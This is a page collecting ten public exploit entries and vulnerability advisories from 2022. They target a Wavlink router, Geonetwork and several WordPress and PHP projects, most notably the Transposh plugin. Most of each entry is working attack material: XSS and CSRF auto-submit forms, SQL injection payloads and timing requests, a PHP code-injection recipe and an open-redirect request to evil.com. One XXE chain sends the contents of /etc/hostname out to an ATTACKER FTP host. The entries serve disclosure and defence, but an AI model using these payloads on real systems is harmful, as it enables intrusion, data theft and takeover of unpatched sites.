<pre><code># Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)<br /># Exploit Author: Ahmed Alroky<br /># Author Company : AIactive<br /># Version: M33A8.V5030.190716<br /># Vendor home page : wavlink.com<br /># Authentication Required: No<br /># CVE : CVE-2022-34048<br /># Tested on: Windows<br /><br /># Poc code<br /><html><br /> <!-- CSRF PoC - generated by Burp Suite Professional --><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST"><br /> <input type="hidden" name="newUI" value="1" /><br /> <input type="hidden" name="page" value="login" /><br /> <input type="hidden" name="username" value="admin" /><br /> <input type="hidden" name="langChange" value="0" /><br /> <input type="hidden" name="ipaddr" value="196.219.234.10" /><br /> <input type="hidden" name="login_page" value="x");alert(9);x=("" /><br /> <input type="hidden" name="homepage" value="main.shtml" /><br /> <input type="hidden" name="sysinitpage" value="sysinit.shtml" /><br /> <input type="hidden" name="wizardpage" value="wiz.shtml" /><br /> <input type="hidden" name="hostname" value="59.148.80.138" /><br /> <input type="hidden" name="key" value="M94947765" /><br /> <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" /><br /> <input type="hidden" name="lang_select" value="en" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin ‘SeatReg’ - Unauthenticated Open<br />Redirect<br /># Date: 01-08-2022<br /># Exploit Author: Mariam Tariq - HunterSherlock<br /># Vendor Homepage: https://wordpress.org/plugins/seatreg/<br /># Version: 1.23.0<br /># Tested on: Firefox<br /># Contact me: mariamtariq404@gmail.com<br /><br />*#Description:*<br /><br />An Open Redirection is a vulnerability when a web application or server<br />uses an unvalidated user-submitted link to redirect the user to a given<br />website or page.<br /><br />*#Example of Burp Request *<br />```<br />POST /wp-admin/admin-post.php HTTP/1.1<br />Host: website.com<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0)<br />Gecko/20100101 Firefox/103.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://website.com<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 185<br />Origin: https://website.com<br />Connection: close<br />Cookie: {cookies_here}<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: Navigate<br />Sec-Fetch-Site: same-origin<br /><br />new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com<br /><https://evil.com>*&submit=Create+new+registration<br />```<br />*#PoC Image:*<br /><br />https://ibb.co/tCZWH0H<br />https://ibb.co/5kh299z<br /></code></pre>
<pre><code># Exploit Title: Crime Reporting System - Blind SQL Injection on Login email parameter <br /># Date: 31/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: code-projects.org<br /># Software Link: https://download-media.code-projects.org/2020/07/Online_Crime_Reporting_System_Project_Report_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD.zip<br /># Version: 1.0<br /># Tested on: Centos 7 apache2 + MySQL<br /><br />Crime Reporting System sustained to the attack Blind SQL Injection at the login page on email parameter.<br /><br /># Payload used --> 'or sleep(5)#<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Reliance on File Name or Extension of Externally-Supplied File [CWE-646]<br />Date found: 2022-02-21<br />Date published: 2022-07-22<br />CVSSv3 Score: 9.1 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)<br />CVE: CVE-2022-25812<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The plugin's "save_transposh" action available at "/wp-admin/admin.php?page=tp_advanced"<br />does not properly validate the "Log file name" allowing an attacker with the<br />"Administrator" role to specify a .php file as the log destination.<br /><br />Since the log file is stored directly within the "/wp-admin" directory, executing<br />arbitrary PHP code is possible by simply sending a crafted request that gets<br />logged.<br /><br />Successful exploits can allow the attacker to compromise the entire WordPress<br />installation. This is specifically relevant in multi-site installations.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />1.Go to "/wp-admin/admin.php?page=tp_advanced" and "Enable debugging" by pointing<br /> it to a filename with a .php extension.<br />2.Set the "Level of logging" to "Debug"<br />3.Saving the settings<br />4.Submit a payload like "<?php phpinfo();?>" to any of Transposh's functionalities.<br />5.Go to "/wp-admin/[your-filename.php]" to trigger the code injection<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-02-21: Discovery of the vulnerability<br />2022-02-21: Contacted the vendor via email<br />2022-02-21: Vendor response<br />2022-02-22: CVE requested from WPScan (CNA)<br />2022-02-23: WPScan assigns CVE-2022-25812<br />2022-05-22: Sent request for status update on the fix<br />2022-05-24: Vendor states that there is no update planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Improper Authorization [CWE-285]<br />Date found: 2022-02-21<br />Date published: 2022-07-22<br />CVSSv3 Score: 6.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N)<br />CVE: CVE-2022-25811<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The WordPress plugin's "tp_editor" page at "/wp-admin/admin.php?page=tp_editor" is<br />vulnerable to two authenticated, blind SQL Injections when user-supplied input to<br />the HTT GET parameters "order" and "orderby" is processed by the web application.<br /><br />Since the application does not properly validate and sanitize these parameters, an<br />attacker with the role "Administrator" is able to inject arbitrary SQL commands<br />against the backend database server of the web application.<br /><br />Successful exploits can allow the attacker to access the WordPress backend<br />database and thereby read sensitive contents. This is specifically relevant in<br />multi-site installations.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />To exploit the "order" parameter:<br /><br />GET /wp-admin/admin.php?page=tp_editor&orderby=lang&order=page=tp_editor&orderby=lang&order=asc,(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(10)%20ELSE%202%20END)) HTTP/1.1<br />Host: localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0<br />Cookie: [Your Cookies]<br />Connection: close<br /><br />To exploit the "orderby" parameter:<br /><br />GET /wp-admin/admin.php?page=tp_editor&orderby=lang&order=page=tp_editor&orderby=lang,(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(10)%20ELSE%202%20END))&order=asc HTTP/1.1<br />Host: localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0<br />Cookie: [Your Cookies]<br />Connection: close<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-02-21: Discovery of the vulnerability<br />2022-02-21: Contacted the vendor via email<br />2022-02-21: Vendor response<br />2022-02-22: CVE requested from WPScan (CNA)<br />2022-02-23: WPScan assigns CVE-2022-25811<br />2022-05-22: Sent request for status update on the fix<br />2022-05-24: Vendor states that there is no update planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br />https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Improper Authorization [CWE-285]<br />Date found: 2022-02-21<br />Date published: 2022-07-22<br />CVSSv3 Score: 6.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)<br />CVE: CVE-2022-25810<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />Transposh does not properly enforce authorization on functionalities available on<br />the plugin's "Utilities" page leading to unauthorized access for all user roles,<br />including "Subscriber".<br /><br />Some of the affected functionality is:<br />tp_backup - Initiate a new backup<br />tp_reset - Reset the plugin's configuration<br />tp_cleanup - Delete automated translations<br />tp_dedup - Delete duplicates<br />tp_maint - Fix internal errors<br />tp_translate_all - Trigger an auto-translation of all entries<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />An exemplary request to reset the plugin's configuration, send the following<br />request using a "Subscriber" account:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 15<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your cookies]<br />Connection: close<br /><br />action=tp_reset<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-02-21: Discovery of the vulnerability<br />2022-02-21: Contacted the vendor via email<br />2022-02-21: Vendor response<br />2022-02-22: CVE requested from WPScan (CNA)<br />2022-02-23: WPScan assigns CVE-2022-25810<br />2022-05-22: Sent request for status update on the fix<br />2022-05-24: Vendor states that there is no update planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code># Exploit Title: Geonetwork 4.2.0 - XML External Entity (XXE)<br /># Date: 2022-July-11<br /># Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)<br /># Vendor Homepage: https://geonetwork-opensource.org/<br /># Version: Geonetwork 3.10.X through 4.2.0<br /># Tested on: Microsoft Windows Server & Linux<br /><br /># Description:<br /># GeoNetwork 3.1.x through 4.2.0<br /># During rendering pdf of map.<br /># The XML parser is now configured securely to validate submitted XML document accepted from an untrusted source, which might result in arbitrary files retrieval from the server.<br /><br />====================PDF RENDERING==================== <br /><br />POST /geonetwork/pdf/create.json HTTP/1.1<br />Host: REDACTED<br />Content-Type: application/json<br />Connection: close<br />Content-Length: 563<br /><br />{"layout":"landscape","srs":"","units":"m","rotation":0,"lang":"fre","dpi":"190","outputFormat":"pdf","layers":[{"opacity":1,"type":"mapServer","baseURL":"http://attacker/xxe.xml","layers":["Tracts",],<br /><br />"format":"image/svg+xml","name":"xxe","extent":[-20037508.34,-20037508.34,20037508.34,<br /><br />20037508.34],<br /><br />"tileSize":[256,256]}],"enableLegends":true,"hasTitle":true,"hasNoTitle":false,"hasAttribution":false,"pages":[{"center":[172063.3620639667,4200083.030736061],"scale":"2.5E7","dataOwner":"© ","rotation":0,"comment":"ok","title":"ok","langfre":true}]}<br /><br /><br />The parameters baseURL will be your XML files : <br /><br />====================XXE_ATTACK==================== <br /><br />====================XXE.XML=======================<br /><br /><!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1; ]><br /><foo>&external;</foo><br /><br />====================X.dtd=========================<br />They will call the x.dtd<br /><br /><!ENTITY % stuff SYSTEM "file:///etc/hostname"><br /><!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'>"><br /><br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]<br />Date found: 2022-07-13<br />Date published: 2022-07-22<br />CVSSv3 Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br />CVE: CVE-2022-2462<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />Transposh offers an ajax action called "tp_history" which is intended to return<br />data about who has translated a text given by the "token" parameter. However, the<br />plugin also returns the user's login name as part of the "user_login" attribute.<br /><br />Successful exploits can allow an unauthenticated attacker to leak the WordPress<br />username of translators. If an anonymous user submitted the translation, then the<br />user's IP address is returned.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept returns the information of the translated text<br />"Calendly URL":<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: [host]<br />Content-Length: 36<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />User-Agent: Mozilla/5.0<br />Connection: close<br /><br />action=tp_history&token=Calendly%20URL&lang=en<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-07-13: Discovery of the vulnerability<br />2022-07-13: CVE requested from WPScan (CNA)<br />2022-07-18: No response from WPScan<br />2022-07-18: CVE requested from Wordfence (CNA) instead<br />2022-07-18: Sent note to vendor<br />2022-07-18: Wordfence assigns CVE-2022-2462<br />2022-07-20: Vendor states that there is no update planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code># Exploit Title: Crime reporting system - Stored cross-site scripting (XSS)<br /># Date: 29/07/2022<br /># Exploit Author: Eslam Reda<br /># Vendor Homepage: https://sourcecodehero.com/crime-reporting-system-project-in-php-with-source-code/<br /># Software Link: https://sourcecodehero.com//wp-content/uploads/2022/03/Crime-Reporting-System-Project-in-PHP-with-source-code.zip<br /># Version: v1.0<br /># Tested on: Linux/Windows<br /><br />1. Login to the application "the default credentials are username:jude - password:12345", go to add users "/admin/a_users.php".<br />2. Fill in the form with valid information.<br />3. Intercept the traffic with a proxy and add the payload (<script>alert(9)</script>)) in the surname field.<br />4. Payload will be stored and executed when visiting "/admin/v_users.php"<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Cross-Site Request Forgery [CWE-253]<br />Date found: 2021-08-19<br />Date published: 2022-07-22<br />CVSSv3 Score: 5.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L)<br />CVE: CVE-2021-24912<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The WordPress plugin lacks anti-CSRF protection on a lot of its functionalities<br />such as the following WordPress ajax actions:<br /><br />tp_backup - Initiates a new backup<br />tp_reset - Resets the plugin's configuration<br />tp_cleanup - Deletes automated translations<br />tp_dedup - Deletes duplicates<br />tp_maint - Fixes internal errors<br />tp_translate_all - Triggers an auto-translation of all entries<br />tp_translation - Adds a new translation for a given item<br /><br />Since there is no anti-CSRF token protecting these functionalities, they are<br />vulnerable to Cross-Site Request Forgery attacks allowing an attacker to perform<br />a variety of attacks as mentioned above.<br /><br />To successfully exploit this vulnerability, a user with the right to access the<br />Transposh "Utilities" or the right to add new translations must be tricked into<br />visiting an arbitrary website while having an authenticated session in the<br />application.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />An exemplary exploit to reset the plugin's configuration:<br /><br /><html><br /> <body><br /> <form action="http://[host]/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="tp_reset" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2021-08-19: Discovery of the vulnerability<br />2021-08-20: Contacted the vendor via their contact form<br />2021-08-20: Vendor response<br />2021-08-20: Sent all the PoC exploits<br />2021-08-20: Vendor acknowledges the issues<br />2021-09-14: Requested status update from vendor<br />2021-10-07: No response from vendor, requested status update again<br />2021-10-25: CVE requested from WPScan (CNA)<br />2021-10-27: WPScan assigns CVE-2021-24912<br />2022-05-22: Sent request for status update on the fix<br />2022-05-24: Vendor states that there is no updated planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>